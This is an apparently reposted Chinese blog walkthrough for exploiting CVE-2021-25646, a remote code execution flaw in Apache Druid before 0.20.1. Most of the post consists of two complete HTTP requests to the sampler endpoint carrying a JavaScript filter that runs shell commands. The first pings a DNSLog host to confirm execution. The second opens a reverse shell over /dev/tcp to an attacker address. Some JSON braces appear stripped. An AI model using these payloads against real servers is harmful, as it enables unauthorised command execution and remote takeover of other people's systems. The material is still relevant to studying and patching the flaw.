druid 远程命令执行(CVE-2021-25646)

Posted 【码猿】

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了druid 远程命令执行(CVE-2021-25646)相关的知识,希望对你有一定的参考价值。

druid 远程命令执行

druid 介绍

Druid是一个专为大型数据集上的高性能切片和OLAP分析而设计的数据存储。Druid最常用作为GUI分析应用程序提供动力的数据存储,或者用作需要快速聚合的高度并发API的后端

影响版本

Apache Druid < 0.20.1

漏洞简介

Apache Druid包括执行用户提供的javascript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。

漏洞复现

  1. DNSLog

    POST /druid/indexer/v1/sampler HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 679
Connection: close


    "type": "index",
    "spec": 
        "type": "index",
        "ioConfig": 
            "type": "index",
            "firehose": 
                "type": "local",
                "baseDir": "quickstart/tutorial/",
                "filter": "wikiticker-2015-09-12-sampled.json.gz"
            
        ,
        "dataSchema": 
            "dataSource": "sample",
            "parser": 
                "type": "string",
                "parseSpec": 
                    "format": "json",
                    "timestampSpec": 
                        "column": "time",
                        "format": "iso"
                    ,
                    "dimensionsSpec": 
                
            ,
            "transformSpec": 
                "transforms": [],
                "filter": 
                    "type": "javascript",
                    "function": "function(value)return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 ping 2mp3kb.dnslog.cn')",
                    "dimension": "added",
                    "": 
                        "enabled": "true"
                    
                
            
        
    ,
    "samplerConfig": 
        "numRows": 500,
        "timeoutMs": 15000,
        "cacheKey": "4ddb48fdbad7406084e37a1b80100214"

  2. 反弹shell

    POST /druid/indexer/v1/sampler HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 679
Connection: close


	"type": "index",
	"spec": 
		"type": "index",
		"ioConfig": 
			"type": "index",
			"firehose": 
				"type": "local",
				"baseDir": "quickstart/tutorial/",
				"filter": "wikiticker-2015-09-12-sampled.json.gz"
			
		,
		"dataSchema": 
			"dataSource": "sample",
			"parser": 
				"type": "string",
				"parseSpec": 
					"format": "json",
					"timestampSpec": 
						"column": "time",
						"format": "iso"
					,
					"dimensionsSpec": 
				
			,
			"transformSpec": 
				"transforms": [],
				"filter": 
					"type": "javascript",
					"function": "function(value)return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/ip/port 0>&1')",
					"dimension": "added",
					"": 
						"enabled": "true"
					
				
			
		
	,
	"samplerConfig": 
		"numRows": 500,
		"timeoutMs": 15000,
		"cacheKey": "4ddb48fdbad7406084e37a1b80100214"

返回的状态码为200则为成功。

该漏洞是在认证完之后才可以复现的!!!

以上是关于druid 远程命令执行(CVE-2021-25646)的主要内容,如果未能解决你的问题,请参考以下文章

CVE-2021-25646Apache Druid 远程代码执行漏洞复现

Apache druid未授权命令执行漏洞复现

Druid数据库密码加密

Druid连接远程ORACLE出现Rest 连接超时等问题

Druid使用ConfigFilter

mybatis+Druid连接池的问题